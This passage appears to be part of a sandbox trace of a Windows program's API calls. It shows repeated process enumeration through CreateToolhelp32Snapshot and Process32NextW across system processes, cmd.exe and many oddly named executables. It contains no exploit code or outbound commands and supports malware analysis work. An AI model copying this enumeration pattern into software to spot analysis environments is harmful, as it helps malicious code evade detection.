szExeFile="taskeng.exe")) returned 1 [0103.213] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0103.215] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0103.216] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.218] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0103.220] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0103.221] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0103.223] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0103.224] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0103.226] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0103.228] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0103.229] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0103.230] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0103.232] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0103.233] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0103.235] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0103.237] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0103.238] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0103.239] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0103.315] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0103.316] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0103.317] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0103.318] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0103.319] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0103.320] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0103.321] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.322] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0103.323] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb74, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0103.324] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0103.325] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbbc, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0103.326] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0103.327] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0103.328] CloseHandle (hObject=0xbc) returned 1 [0103.328] Sleep (dwMilliseconds=0x12c) [0103.671] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0103.677] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0103.678] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0103.678] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0103.679] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0103.680] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0103.681] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0103.681] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0103.682] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0103.683] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0103.683] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0103.684] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.685] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.685] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.686] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.687] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.687] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0103.688] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.689] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.689] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0103.690] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.692] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0103.693] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0103.694] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0103.695] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0103.696] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.697] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0103.698] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0103.699] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0103.701] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0103.702] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0103.750] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0103.752] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0103.753] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0103.754] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0103.755] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0103.756] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0103.757] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0103.758] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0103.759] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0103.760] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0103.761] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0103.763] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0103.764] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0103.765] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0103.766] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0103.767] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0103.768] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.769] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0103.770] CloseHandle (hObject=0xc4) returned 1 [0103.770] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0103.774] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0103.775] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0103.776] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, 